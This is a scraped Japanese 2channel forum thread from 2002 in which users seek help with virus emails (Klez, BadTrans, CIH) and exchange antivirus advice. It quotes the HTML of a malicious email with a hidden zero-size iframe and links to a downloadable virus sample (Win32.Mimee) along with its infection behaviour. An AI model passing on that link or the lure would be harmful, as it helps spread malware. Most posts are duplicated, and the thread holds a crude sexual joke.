Outlook Expressを使っていなければ、除外しなくても不具合が起きなかった。
http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/543a1624cf3230b349256a5d004a46e1/b877a752580252a449256aff005d2c63?OpenDocument
http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/543a1624cf3230b349256a5d004a46e1/7a1bb8160ac42cb649256aff005cf154?OpenDocument
http://service2.symantec.co.jp/jp-support/faqpub_si.nsf/7a63e7e7d6a83a5f49256a5d004a46e0/d1e544250123822949256aee00027bad?OpenDocument
814 :名無しさん@お腹いっぱい。:02/03/16 20:48
admin.dll というウイルスにかかってしまいました。
MSNメッセンジャーが使えなくなるやつです。
ノートンアンチウイルス入ってるのに何故かかってしまったんでしょう?
MSNメッセンジャーが使えなくなるやつです。
ノートンアンチウイルス入ってるのに何故かかってしまったんでしょう?
815 :名無しさん@お腹いっぱい。:02/03/16 20:53
>>814
人生そんなもん
人生そんなもん
816 :名無しさん@お腹いっぱい。:02/03/16 21:40
件名がtestってメールが沢山来ているんですが
これってウイルスですか?
まだ恐くて開いていませんが、教えてください。
これってウイルスですか?
まだ恐くて開いていませんが、教えてください。
817 :名無しさん@お腹いっぱい。:02/03/16 21:41
818 :名無しさん@お腹いっぱい。:02/03/16 21:44
819 :(・з;):02/03/16 23:28
差出人 :
"Ramli Bin Ab. Aziz" <[email protected]>
件名 : Re:
日付 : Fri, 15 Mar 2002 23:44:28 +0800 (SGT)
添付ファイル : Me_nude.MP3.scr (38k), TEXT5.txt (0b)
これってウィルスだよね?
"Ramli Bin Ab. Aziz" <[email protected]>
件名 : Re:
日付 : Fri, 15 Mar 2002 23:44:28 +0800 (SGT)
添付ファイル : Me_nude.MP3.scr (38k), TEXT5.txt (0b)
これってウィルスだよね?
820 :cheshire-cat:02/03/16 23:35
821 :名無しさん@お腹いっぱい。:02/03/17 00:26
822 :名無しさん@お腹いっぱい。:02/03/17 00:26
823 :cheshire-cat:02/03/17 00:30
824 :名無しさん@お腹いっぱい。:02/03/17 00:54
どうでもいいけど、差出人の名前がモロにアラブ。
825 :名無しさん@お腹いっぱい。:02/03/17 00:55
ファイル名がどうとか、件名がどうとかいう以前に、心当たりのない
差出人が実行ファイル送ってきたのだからウィルスで当然だと思う
心がけが必要。
差出人が実行ファイル送ってきたのだからウィルスで当然だと思う
心がけが必要。
826 : :02/03/17 03:06
心当たりのある差出人にも注意!!!!!!!!!!!!!!!!!!!
827 :名無しさん@お腹いっぱい。:02/03/17 03:21
>>826
なんか殺伐とした社会生活を送ってないかキミ。
なんか殺伐とした社会生活を送ってないかキミ。
828 :名無しさん@お腹いっぱい。:02/03/17 03:22
86 :学生さんは名前がない :02/03/16 21:26
法学部で撮ったたぬきの写真。
http://mbspro5.uic.to/user/mikkixi.html
↑はウイルスなんでしょうか?
パソコン初心者なんでよくわかりません。
入ってしまいました。そしたら、いきなりウイルスのインストールを完了しましたって言われた。
まだ、何もおきません。
法学部で撮ったたぬきの写真。
http://mbspro5.uic.to/user/mikkixi.html
↑はウイルスなんでしょうか?
パソコン初心者なんでよくわかりません。
入ってしまいました。そしたら、いきなりウイルスのインストールを完了しましたって言われた。
まだ、何もおきません。
829 :名無しさん@お腹いっぱい。:02/03/17 03:27
830 :心当たりのある差出人にも注意!!!!!!!!!!!!!!!!!!! :02/03/17 03:44
>>827
アドレス帳にアドレスがある可能性がある。
らるー送ってくるアフォもいる。
−−−−−−
ウイルスのチェックは最低限必要。
−−−−−−
インターネット=ソープランドのマンコ
パソコン=チンコ
これでもナマでヤリますか?
淋、蔵まみれになりますか?
アドレス帳にアドレスがある可能性がある。
らるー送ってくるアフォもいる。
−−−−−−
ウイルスのチェックは最低限必要。
−−−−−−
インターネット=ソープランドのマンコ
パソコン=チンコ
これでもナマでヤリますか?
淋、蔵まみれになりますか?
831 :名無しさん@お腹いっぱい。:02/03/17 06:37
832 :名無しさん@お腹いっぱい。:02/03/17 12:59
閲覧したウェブページから送信先、件名、ファイル名を
作成するウィルスらしきメールが送信されてきています。
どなたかウィルス名に心当たりある方はいらっしゃいませんでしょうか?
例えばこのページなら、
To:[email protected](819参照)
Subject:Symantec(1参照)
添付ファイル:Symantec.exe(またはbat)
また何故かその時閲覧したキャッシュファイルも送ってくるようです。
例:l50[1].html
メールの送信者はどうも、アドレス帳からランダムに選んでいる臭いです。
Recieved fromのサーバとは別のアドレスになっていました。
IPA ISECのデータベースでは分かりませんでした。
情報少ないと思いますが、ご存知でしたら教えて下さい。
作成するウィルスらしきメールが送信されてきています。
どなたかウィルス名に心当たりある方はいらっしゃいませんでしょうか?
例えばこのページなら、
To:[email protected](819参照)
Subject:Symantec(1参照)
添付ファイル:Symantec.exe(またはbat)
また何故かその時閲覧したキャッシュファイルも送ってくるようです。
例:l50[1].html
メールの送信者はどうも、アドレス帳からランダムに選んでいる臭いです。
Recieved fromのサーバとは別のアドレスになっていました。
IPA ISECのデータベースでは分かりませんでした。
情報少ないと思いますが、ご存知でしたら教えて下さい。
追加。
本文は以下のようになっていました。
<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:H8MUE77q083 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>
また添付ファイルのContent-typeは
Content-Type: audio/x-midi
です。
本文は以下のようになっていました。
<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:H8MUE77q083 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>
また添付ファイルのContent-typeは
Content-Type: audio/x-midi
です。
834 :名無しさん@お腹いっぱい。:02/03/17 13:05
>>834
情報どうもありがとうございます。
ただ、頂いた情報を元にIPA,MacAfee,Symantecで検索したのですが、
一致する情報を得られませんでした・・・。
他のウィルスでは無いでしょうか。
(勘違いでしたら申し訳ありません)
情報どうもありがとうございます。
ただ、頂いた情報を元にIPA,MacAfee,Symantecで検索したのですが、
一致する情報を得られませんでした・・・。
他のウィルスでは無いでしょうか。
(勘違いでしたら申し訳ありません)
836 :名無しさん@お腹いっぱい。:02/03/17 13:27
横槍な上に関係ないかもしれなくてすみませんが、
http://itpro.nikkeibp.co.jp/NOS/reference/BUGTRAQ-JP-20010409091825-B7A1.txt
この辺が近いかもしれないと思いますが。
http://itpro.nikkeibp.co.jp/NOS/reference/BUGTRAQ-JP-20010409091825-B7A1.txt
この辺が近いかもしれないと思いますが。
>>836
どうもありがとうございます。対策情報ですね?
取り敢えずブラウザ等は最新版(&パッチ)はあてていますが・・・
IEとOE使っていると、いつ感染するか分からないので冷や冷やですね。
ちなみに、また同じ人アドレスからウィルス来ていました。
今度はどうも種類の違うウィルス・・・かもしれませんが。
閲覧したキャッシュファイルを同時に送ると言う特徴は同じです。
こっちもIPAでは検索できませんでした(検索下手?)
Subject:A special new game
本文:
<HTML><HEAD></HEAD><BODY>
<FONT>This is a special new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT>
<br><br>
-----------------------------------------------------<br>
Kredyt przez internet - <a =
href=3Dhttp://www.finanse.hoga.pl>www.finanse.hoga.pl</a><br>
</body></html>
添付ファイル:setup.exe
どうもありがとうございます。対策情報ですね?
取り敢えずブラウザ等は最新版(&パッチ)はあてていますが・・・
IEとOE使っていると、いつ感染するか分からないので冷や冷やですね。
ちなみに、また同じ人アドレスからウィルス来ていました。
今度はどうも種類の違うウィルス・・・かもしれませんが。
閲覧したキャッシュファイルを同時に送ると言う特徴は同じです。
こっちもIPAでは検索できませんでした(検索下手?)
Subject:A special new game
本文:
<HTML><HEAD></HEAD><BODY>
<FONT>This is a special new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT>
<br><br>
-----------------------------------------------------<br>
Kredyt przez internet - <a =
href=3Dhttp://www.finanse.hoga.pl>www.finanse.hoga.pl</a><br>
</body></html>
添付ファイル:setup.exe
838 :名無しさん@お腹いっぱい。:02/03/17 17:08
840 :名無しさん@お腹いっぱい。:02/03/17 17:30
>>839
誰もお前みたいな無知に教えてほしくないだろ プ
誰もお前みたいな無知に教えてほしくないだろ プ
842 :名無しさん@お腹いっぱい。:02/03/17 18:56
>>841
夜中にならないと詳しい人来ないから、暫くしたらまた来るよろし。
夜中にならないと詳しい人来ないから、暫くしたらまた来るよろし。
843 :名無しさん@お腹いっぱい。:02/03/17 19:15
すみません、質問です。
PCを立ち上げると、WININITが開くようになりました。
検索で調べるとウイルスの可能性が高いようなのですが、WININIT.INIファイルは
見つかりませんし、ノートンのアンチウイルスでスキャンしても何も引っかかり
ません。
どうしたらWININITが立ち上がらないようにできるのでしょうか。
ご存知の方がいらっしゃれば、教えていただけませんか?
PCを立ち上げると、WININITが開くようになりました。
検索で調べるとウイルスの可能性が高いようなのですが、WININIT.INIファイルは
見つかりませんし、ノートンのアンチウイルスでスキャンしても何も引っかかり
ません。
どうしたらWININITが立ち上がらないようにできるのでしょうか。
ご存知の方がいらっしゃれば、教えていただけませんか?
844 :名無しさん@お腹いっぱい。:02/03/17 19:26
家のじいちゃんは
I LOVE YOU にやられてから
パソコンの前に塩盛ってるよ
I LOVE YOU にやられてから
パソコンの前に塩盛ってるよ
845 :名無しさん@お腹いっぱい。:02/03/17 19:44
848 :名無しさん@お腹いっぱい。:02/03/17 20:25
Worm Klez.Eに感染しました、どうすればいいですか?
849 :名無しさん@お腹いっぱい。:02/03/17 20:29
パソコン初心者ですが去年こんなメールがきました。
差出人:RIKO <[email protected]>
日時:2001年11月30日 0:55
件名:Re:
添付:ATT00026.txt(178バイト) ATT00029.txt(137バイト)
ATT00032.txt(0バイト)
------------------ Virus Warning Message (on mail)
Found virus WORM_BADTRANS.B in file Me_nude.MP3.scr
The file Me_nude.MP3.scr is moved to /etc/iscan/virus/virABA0o0mHk.
---------------------------------------------------------
ウイルスは間違いないのですがこのウイルスはどういった症状が起こるのか
教えてください。今のところ特に大きな異変はないです。
差出人:RIKO <[email protected]>
日時:2001年11月30日 0:55
件名:Re:
添付:ATT00026.txt(178バイト) ATT00029.txt(137バイト)
ATT00032.txt(0バイト)
------------------ Virus Warning Message (on mail)
Found virus WORM_BADTRANS.B in file Me_nude.MP3.scr
The file Me_nude.MP3.scr is moved to /etc/iscan/virus/virABA0o0mHk.
---------------------------------------------------------
ウイルスは間違いないのですがこのウイルスはどういった症状が起こるのか
教えてください。今のところ特に大きな異変はないです。
850 :名無しさん@お腹いっぱい。:02/03/17 20:34
最近よく来るウイルスメールに、件名が「Run in DOS mode」となっているものが
あります。これについてご存知の方、教えていただけないでしょうか?
検索をかけたのですが、違うものにヒットしてしまってよく分らなかったもので……。
あります。これについてご存知の方、教えていただけないでしょうか?
検索をかけたのですが、違うものにヒットしてしまってよく分らなかったもので……。
851 :名無しさん@お腹いっぱい。:02/03/17 20:36
852 :名無しさん@お腹いっぱい。:02/03/17 20:39
853 :名無しさん@お腹いっぱい。:02/03/17 20:44
854 :名無しさん@お腹いっぱい。:02/03/17 20:46
>>852
そうですか。でも最近小さな異変があるのですがこれはウイルスと関係あるのですか?
症状は↓です。
次のページに進んだり、新しいウインドウで開く時、Internet Explorer の
オン デマンド インストールというのが出てきます。文字を正しく表示するのに
ダウンロードが必要です。という奴です。キャンセルを押しても全然消えなくて、
仕方なくダウンロードをするを押しても、失敗しました。もう一度やり直してください。の繰り返し。
ウインドウを閉じようとするとこれを閉じると問題が発生します。のようなことがでてきます。
結局これは本体の電源を切るまで消えません。
そうですか。でも最近小さな異変があるのですがこれはウイルスと関係あるのですか?
症状は↓です。
次のページに進んだり、新しいウインドウで開く時、Internet Explorer の
オン デマンド インストールというのが出てきます。文字を正しく表示するのに
ダウンロードが必要です。という奴です。キャンセルを押しても全然消えなくて、
仕方なくダウンロードをするを押しても、失敗しました。もう一度やり直してください。の繰り返し。
ウインドウを閉じようとするとこれを閉じると問題が発生します。のようなことがでてきます。
結局これは本体の電源を切るまで消えません。
855 :cheshire-cat:02/03/17 20:49
>>854
IEのプロパティ→セキュリティ→フォントのダウンロードを無効にしれ。
IEのプロパティ→セキュリティ→フォントのダウンロードを無効にしれ。
856 :名無しさん@お腹いっぱい。:02/03/17 20:50
>854
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
まさかsp2にしてないって話じゃないよね?
あと、差出人のアドレスが出ちゃってます。
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
まさかsp2にしてないって話じゃないよね?
あと、差出人のアドレスが出ちゃってます。
857 :854:02/03/17 20:53
まだパソコンのことよくわからないのです。sp2も知りません。
>>856のサイトにいけば何かわかるのですか?
>>856のサイトにいけば何かわかるのですか?
858 :名無しさん@お腹いっぱい。:02/03/17 20:53
>>854
どう考えてもウィルスの症状ではない。
ページを表示するのに必要なフォントが無いから(IEが)どこかからダウンロード
しようとしたんだけど失敗した、という風にみえる。
じゃあ何で失敗するのかと聞かれても困るが・・・
どう考えてもウィルスの症状ではない。
ページを表示するのに必要なフォントが無いから(IEが)どこかからダウンロード
しようとしたんだけど失敗した、という風にみえる。
じゃあ何で失敗するのかと聞かれても困るが・・・
859 :cheshire-cat:02/03/17 21:01
860 :854:02/03/17 21:04
>>859
わかりました。やってみます。
わかりました。やってみます。
861 :名無しさん@お腹いっぱい。:02/03/17 21:04
>851
ありがとうございます
ありがとうございます
862 :非常に珍しいことですが裁判官の個人のHPがあります。:02/03/17 21:43
863 :名無しさん@お腹いっぱい。:02/03/17 21:46
最近WEBページからよくscriptでウイルス送り込まれて
めちゃくちゃ困っています。
まぁ海外のエロサイトからexploitというのを送り込まれてます。
めちゃくちゃ困っています。
まぁ海外のエロサイトからexploitというのを送り込まれてます。
864 :名無しさん@お腹いっぱい。:02/03/17 21:55
865 :cheshire-cat:02/03/17 22:26
>>864
エクセプション系をWebTrapでブロックしたって話のような。
エクセプション系をWebTrapでブロックしたって話のような。
866 :名無しさん@お腹いっぱい。:02/03/17 23:14
>>839 :832 :02/03/17 17:25
>具体的な対策を書いてあるサイトなりを知って、
>自分のサイトに掲載して他の人に警告と対処方法を教えておきたいんです。
>でないと、自分のメールの大半がウィルス状態になりますから・・・(涙)。
>>842 :名無しさん@お腹いっぱい。 :02/03/17 18:56
>夜中にならないと詳しい人来ないから、暫くしたらまた来るよろし。
あまり詳しくはないが ^^)、いちおー夜中になったので、マジレスしよう。
アンチウィルスソフトウェア(とくにウイルスバスター)を入れて、
最新で適切な状態(現状エンジンでの LAN を除く)にしていないであろう
のに、ウィルスなのか確認できていないものをウィルスと決めつけて、
「他の人に警告と対処方法を教えて」やるなどすることは、混乱を助長する
だけだ。 (本末転倒という言葉もある)
ってことだ。
>具体的な対策を書いてあるサイトなりを知って、
>自分のサイトに掲載して他の人に警告と対処方法を教えておきたいんです。
>でないと、自分のメールの大半がウィルス状態になりますから・・・(涙)。
>>842 :名無しさん@お腹いっぱい。 :02/03/17 18:56
>夜中にならないと詳しい人来ないから、暫くしたらまた来るよろし。
あまり詳しくはないが ^^)、いちおー夜中になったので、マジレスしよう。
アンチウィルスソフトウェア(とくにウイルスバスター)を入れて、
最新で適切な状態(現状エンジンでの LAN を除く)にしていないであろう
のに、ウィルスなのか確認できていないものをウィルスと決めつけて、
「他の人に警告と対処方法を教えて」やるなどすることは、混乱を助長する
だけだ。 (本末転倒という言葉もある)
ってことだ。
867 :(・з;)819:02/03/17 23:14
>>866
アンチウィルスソフトはAVGを入れています。
個人的にウィルス対策はウィルス対策ソフトに頼るだけでなく、
自信の警戒心も必要だと思っておりメールを開いていない為、
対策ソフトによる判別は出来ていません。
"混乱を助長する"可能性は確かにあると思います。
寧ろそのように思ったからこそ、ここで教えて頂いてから通達しようと思い、
質問させて頂きました。
勿論、ここで明確に出来なければ警告は出しません。
アンチウィルスソフトはAVGを入れています。
個人的にウィルス対策はウィルス対策ソフトに頼るだけでなく、
自信の警戒心も必要だと思っておりメールを開いていない為、
対策ソフトによる判別は出来ていません。
"混乱を助長する"可能性は確かにあると思います。
寧ろそのように思ったからこそ、ここで教えて頂いてから通達しようと思い、
質問させて頂きました。
勿論、ここで明確に出来なければ警告は出しません。
869 :Mac+Netscape使っていてよかった:02/03/18 02:33
Nimdaスレに書いてしまったけど…
COPYRIGHT ENDというサブジェクトで来るやつがあるから気をつけて。
添付ファイルなしのやつ。
COPYRIGHT ENDというサブジェクトで来るやつがあるから気をつけて。
添付ファイルなしのやつ。
870 :名無しさん@お腹いっぱい、:02/03/18 03:39
エクセプションに遭遇したとログにあった。
ブロックしたらしいので一安心。
javascriptの不正プログラムがどうとか言ってるけど、
アクティブXでもできそうな気が…
むしろこっちの方が恐い…
勝手に掲示板にスクリプトを書きこむなんてなったら恐いな。
まぁ、2ちゃんねるは安全だろうけど…
そう言えば以前、ニムダをファイアウォールがブロックしてたな…
メール以外からも来るなんて驚きだ…
ブロックしたらしいので一安心。
javascriptの不正プログラムがどうとか言ってるけど、
アクティブXでもできそうな気が…
むしろこっちの方が恐い…
勝手に掲示板にスクリプトを書きこむなんてなったら恐いな。
まぁ、2ちゃんねるは安全だろうけど…
そう言えば以前、ニムダをファイアウォールがブロックしてたな…
メール以外からも来るなんて驚きだ…
871 :名無しさん@お腹いっぱい。:02/03/18 06:26
explorer.exeが不正な処理・・・鬱
872 :名無しさん@お腹いっぱい。:02/03/18 08:03
ヘルブレスってネットゲーはウイルスがかかっているって話はまことか(゚∀゚)(゚∀゚)!
873 :名無しさん@お腹いっぱい。:02/03/18 13:03
マカフィーってzipとかlhaファイルを右クリックして個別にスキャンできないんですか?
ノーd先生の時は出来たんですけど…。
何か設定しなければいけないのでしょうか?
当方XP Home
McAfee v4.5.1 SP1です。
ノーd先生の時は出来たんですけど…。
何か設定しなければいけないのでしょうか?
当方XP Home
McAfee v4.5.1 SP1です。
874 :名無しさん@お腹いっぱい。:02/03/18 16:00
ウィルスチェックサービスってどこのISPもだんだんオプションとかで
付け始めたし。
JENS SpinNetでとうとう標準装備になったけどこれはどうなんでしょ??
http://www.watch.impress.co.jp/broadband/news/2002/03/18/jens.htm
うちのISPもただにならないかな。。。
付け始めたし。
JENS SpinNetでとうとう標準装備になったけどこれはどうなんでしょ??
http://www.watch.impress.co.jp/broadband/news/2002/03/18/jens.htm
うちのISPもただにならないかな。。。
875 :JENSに乗り換え検討中:02/03/18 18:13
標準装備っていうのは、目新しい!JENS SpinNetって追加料金なしでメールアドレス6こもらえるから、全アドレスにウイルスチェックついてるのって評価できるんじゃない?他でオプションで申し込むと料金かかるからね。
876 :名無しさん@お腹いっぱい。:02/03/18 18:19
f-tokyo-144116-l3.zero.ad.jp
877 : :02/03/18 19:56
アウトルックエクスプレスを開こうとしたらフリーズしてしまったので、一応ウィルススキャンをしたんです。
そしたらPE_CIHとかいう危険度が高いらしいウィルスが発見されました。
ほとんどの感染ファイルはウィルス駆除ができたのですが、c:\windows\system\mstask.exeというファイルとc:\windows\system\MPREXE.EXEというファイルだけ駆除ができませんでした。
手動で削除しようとしてもWindowsが使用しています、削除できませんと出てきます。
この場合の対処法を教えていただけませんでしょうか?
何回もウィルスバスター2002で駆除しようとしてもその2つのファイルだけは駄目でした。
毎月26日にハードディスクをズタズタにするそうなので早めに教えてください、本当にお願いします。
マシンOSはWindowsMeです。
どうか教えてください、よろしくお願いします。
そしたらPE_CIHとかいう危険度が高いらしいウィルスが発見されました。
ほとんどの感染ファイルはウィルス駆除ができたのですが、c:\windows\system\mstask.exeというファイルとc:\windows\system\MPREXE.EXEというファイルだけ駆除ができませんでした。
手動で削除しようとしてもWindowsが使用しています、削除できませんと出てきます。
この場合の対処法を教えていただけませんでしょうか?
何回もウィルスバスター2002で駆除しようとしてもその2つのファイルだけは駄目でした。
毎月26日にハードディスクをズタズタにするそうなので早めに教えてください、本当にお願いします。
マシンOSはWindowsMeです。
どうか教えてください、よろしくお願いします。
878 :cheshire-cat:02/03/18 21:37
>>877
駆除ツール使え。
駆除ツール使え。
879 : :02/03/18 22:03
>>878
なんのツールを使えばいいんですか?
なんのツールを使えばいいんですか?
880 :cheshire-cat:02/03/18 22:19
>>879
トレンドマイクロって今、ほとんど落ちているような状態で接続できないので。
Symantecで検索
http://www.symantec.com/region/jp/sarcj/vinfodb.html
そこから見つかる、SymantecのCIH情報
http://www.symantec.com/region/jp/sarcj/data/w/w95.cih.html
上記に記載されている、Symantecの駆除ツール。
http://www.symantec.com/region/jp/sarcj/kill_cih.html
えっとね。
多分もう、実行ファイルの幾つかは腐ってるから。完全回復しうるかどうか、漏れは保証しないよ。
どうしてもトレンドの情報の方がいいって言うなら。こちらをどうぞ。繋がらないけど。
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=PE%5FCIH
トレンドマイクロって今、ほとんど落ちているような状態で接続できないので。
Symantecで検索
http://www.symantec.com/region/jp/sarcj/vinfodb.html
そこから見つかる、SymantecのCIH情報
http://www.symantec.com/region/jp/sarcj/data/w/w95.cih.html
上記に記載されている、Symantecの駆除ツール。
http://www.symantec.com/region/jp/sarcj/kill_cih.html
えっとね。
多分もう、実行ファイルの幾つかは腐ってるから。完全回復しうるかどうか、漏れは保証しないよ。
どうしてもトレンドの情報の方がいいって言うなら。こちらをどうぞ。繋がらないけど。
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=PE%5FCIH
881 :名無しさん@お腹いっぱい。:02/03/18 22:38
882 :cheshire-cat:02/03/18 23:19
879はお亡くなりになったか、かわいそうに(鬱
ウィルスの詳細情報は結局分かりませんでしたが、
長引かせても申し訳無いので、諦めます。
ご協力下さったみなさん、ありがとうございました。
また自力で何か分かりましたら、ここに書きます。
長引かせても申し訳無いので、諦めます。
ご協力下さったみなさん、ありがとうございました。
また自力で何か分かりましたら、ここに書きます。
884 :cheshire-cat:02/03/18 23:55
>>884
お送りしました。お手数をお掛けします。
お送りしました。お手数をお掛けします。
886 : :02/03/19 12:40
先日、EASY CD CREATER ver5 を外人からDLしたんです。
それで何気なしにインストールしてから尻無ということに気づいて
削除しました。それから
再起動するたびにEASY CD CREATERのアプグレードを奨めます。
3〜4回目くらいにうんざりしてアプグレしてみようとRoxioに逝きました。
それでアプグレの箇所をクリックしたらいきなり
Operating system not found の画面になったので、
BIOSモードで起動して標準設定値にしましたが直らず、
セーフモードでも起動できません。
どうしたらいいのです?
それで何気なしにインストールしてから尻無ということに気づいて
削除しました。それから
再起動するたびにEASY CD CREATERのアプグレードを奨めます。
3〜4回目くらいにうんざりしてアプグレしてみようとRoxioに逝きました。
それでアプグレの箇所をクリックしたらいきなり
Operating system not found の画面になったので、
BIOSモードで起動して標準設定値にしましたが直らず、
セーフモードでも起動できません。
どうしたらいいのです?
887 :名無しさん@お腹いっぱい。:02/03/19 12:48
なんで自分の尻拭いを他人にさせるかなあ
fdisk /mbr
fdisk /mbr
>887
漏れはXPにアップグレードしてますが fdisk /mbr
の起動は可能でしょうか?
すいません教えてください
漏れはXPにアップグレードしてますが fdisk /mbr
の起動は可能でしょうか?
すいません教えてください
889 :名無しさん@お腹いっぱい。:02/03/19 14:32
>>886
2002年2月の尻集に載ってるのに…
2002年2月の尻集に載ってるのに…
890 :☆最新話題☆:02/03/19 15:34
891 :名無しさん@お腹いっぱい。:02/03/19 15:35
892 :バカヒー専用スレあります。:02/03/19 19:22
893 :名無しさん@お腹いっぱい。:02/03/19 21:44
ウィルスでは無いが、IEに大穴。留意されたし。
http://slashdot.jp/article.pl?sid=02/03/18/2211214&mode=thread
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html
http://slashdot.jp/article.pl?sid=02/03/18/2211214&mode=thread
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html
894 :名無しさん@お腹いっぱい。:02/03/19 21:57
さっきHP見てたら突然ウィルスバスターが起動して、
こんなもの拾ってきました。
TROJ_IMISERV.B
HP見ただけで貰うの初めてです
こんなもの拾ってきました。
TROJ_IMISERV.B
HP見ただけで貰うの初めてです
cheshire-cat殿からご回答頂きまして「KLEZ.E」との事でした。
AVGの最新版では感知は出来ないようですのでご注意下さい。
他のウィルス対策ソフトでは感知できるそうです。
それでは、失礼致します。
AVGの最新版では感知は出来ないようですのでご注意下さい。
他のウィルス対策ソフトでは感知できるそうです。
それでは、失礼致します。
いまだにBADTRANS.Bがほいほい届く。今朝も一通。
最初はいちいち「感染してますよ」と知らせていたんだけど、
いい加減面倒くさくなってしまった・・。
本日をもって放っておく事に決定。ちょっとスッキリ。
最初はいちいち「感染してますよ」と知らせていたんだけど、
いい加減面倒くさくなってしまった・・。
本日をもって放っておく事に決定。ちょっとスッキリ。
897 :名無しさん@お腹いっぱい。:02/03/20 10:50
age
898 :Win32.Mimee:02/03/20 14:10
http://www.ebcvg.com/binary2.php
の
Win32.Mimee
http://www.ebcvg.com/sections/binary/Win32.Mimee.zip
−−−−−
short description :
w32.mimee is written in visual basic 6 and targets .eml files... when executed, it spawns
mime.exe in c:\, searches for .eml in harddrive and infects them by adding itself as an
attachment.. .eml files which are saved in rich text (html), whether or not they contain
attachments, will be successfully infected by w32.mimee... .eml files that are saved in plain
text and are having one or many attachments will also be infected by the virus... .eml files
that are saved in plain text and are containing no attachments won't be successfully infected...
win32.mimee inserts a signature in files that it infects so they won't be reinfected..
no registry modifications are made by the virus...
written just to personally discover the possibility of infecting .eml files...
alcopaul
03/07/2002
−−−−−
Symantec Security Response Automation システムは提出されたファイルを分
析しましたが、悪意があるコードを見つけませんでした。
もし我々に提出したファイルで感染した疑いがあるならば、テクニカルサポー
トにご連絡してください。
の
Win32.Mimee
http://www.ebcvg.com/sections/binary/Win32.Mimee.zip
−−−−−
short description :
w32.mimee is written in visual basic 6 and targets .eml files... when executed, it spawns
mime.exe in c:\, searches for .eml in harddrive and infects them by adding itself as an
attachment.. .eml files which are saved in rich text (html), whether or not they contain
attachments, will be successfully infected by w32.mimee... .eml files that are saved in plain
text and are having one or many attachments will also be infected by the virus... .eml files
that are saved in plain text and are containing no attachments won't be successfully infected...
win32.mimee inserts a signature in files that it infects so they won't be reinfected..
no registry modifications are made by the virus...
written just to personally discover the possibility of infecting .eml files...
alcopaul
03/07/2002
−−−−−
Symantec Security Response Automation システムは提出されたファイルを分
析しましたが、悪意があるコードを見つけませんでした。
もし我々に提出したファイルで感染した疑いがあるならば、テクニカルサポー
トにご連絡してください。
899 : MP3ファイルにもウイルス混入は可能 :02/03/20 15:01
900 :名無しさん@お腹いっぱい。:02/03/20 21:13
あのここ数日、
「Have a funny Lady Day 」もしくは
「Happy Lady Day」というタイトルで送られてくるメールが
多数あるのですがこれはウイルスなのでしょうか?
Symantec等でウイルス情報の検索をかけたのですが何も出てきませんし。
ちなみにファイルサイズは大体、120kb前後です。
「Have a funny Lady Day 」もしくは
「Happy Lady Day」というタイトルで送られてくるメールが
多数あるのですがこれはウイルスなのでしょうか?
Symantec等でウイルス情報の検索をかけたのですが何も出てきませんし。
ちなみにファイルサイズは大体、120kb前後です。
901 :名無しさん@お腹いっぱい。:02/03/20 22:05
うちも昨日から
「write Fixup」「Hello,Your Password」というのがきています。
サイズは同じく120k前後、1つだけテキスト表示で見てみましたが
中身は無く添付ファイルがhtmlとpif。
「write Fixup」「Hello,Your Password」というのがきています。
サイズは同じく120k前後、1つだけテキスト表示で見てみましたが
中身は無く添付ファイルがhtmlとpif。
902 :名無しさん@お腹いっぱい。:02/03/20 22:10
903 :cheshire-cat:02/03/20 22:39
去年、検出できないのをまとめて某社にプレゼントした。
今ごろレスが来た。
半分くらいはまあ、変なファイルにバインドして失敗した壊れた奴とか、解凍したら実行ファイルじゃなかったとか(ろくに確かめもせず送って、反省中)、って回答だった。
残りはさ、「最新の定義ファイルで検出できます」、だって。複雑な気持ち。
某社の定義ファイルの更新が先日重かったのは、漏れのせいです。
今ごろレスが来た。
半分くらいはまあ、変なファイルにバインドして失敗した壊れた奴とか、解凍したら実行ファイルじゃなかったとか(ろくに確かめもせず送って、反省中)、って回答だった。
残りはさ、「最新の定義ファイルで検出できます」、だって。複雑な気持ち。
某社の定義ファイルの更新が先日重かったのは、漏れのせいです。
904 :900:02/03/20 22:42
905 :cheshire-cat:02/03/20 22:46
906 :名無しさん@お腹いっぱい。:02/03/20 22:52
つーかチェシャ猫の人。
832のVirを欲しがったのは単にコレクションしたいだけなのかと思ってたら
ちゃんと調べたのね。お勤めご苦労様。
832のVirを欲しがったのは単にコレクションしたいだけなのかと思ってたら
ちゃんと調べたのね。お勤めご苦労様。
907 :900:02/03/20 23:03
908 :cheshire-cat:02/03/20 23:04
>>906
本人にはメル送りました。
現在漏れが所有している3タイプのうちの一つでした。
「件名や送信者名が多様だから」、って思い込みのためなんでしょうか。
漏れVilliはVBSしか理解できない厨だから、人に何か教えるほどのスキル無いけど。
配布(と言っていいのか?)は、メル経由と他のファイルにバインドしてMX、この2つが主流。シルクロープでも使えば簡単だろうし。
なおKLEZ系は、NortonとTrendとAitidoteとMcAFEEは同様の情報だけど。
何か情報が交錯してるっしょ?
ちなみにSophosは、あと2つほど検出名多いです。
本人にはメル送りました。
現在漏れが所有している3タイプのうちの一つでした。
「件名や送信者名が多様だから」、って思い込みのためなんでしょうか。
漏れVilliはVBSしか理解できない厨だから、人に何か教えるほどのスキル無いけど。
配布(と言っていいのか?)は、メル経由と他のファイルにバインドしてMX、この2つが主流。シルクロープでも使えば簡単だろうし。
なおKLEZ系は、NortonとTrendとAitidoteとMcAFEEは同様の情報だけど。
何か情報が交錯してるっしょ?
ちなみにSophosは、あと2つほど検出名多いです。
909 :cheshire-cat:02/03/20 23:10
910 :名無しさん@お腹いっぱい。:02/03/20 23:30
>>908
VBS読めるならOffice のマクロ系も読めるよ(メリッサとか)。
VBS読めるならOffice のマクロ系も読めるよ(メリッサとか)。
どうもうちに来た物と同種の物が企業にも被害を与えているようです。
直接的な物ではありませんが、困ったウィルスですね。
http://www.bestrsv.com/info/virus-rep010.html
直接的な物ではありませんが、困ったウィルスですね。
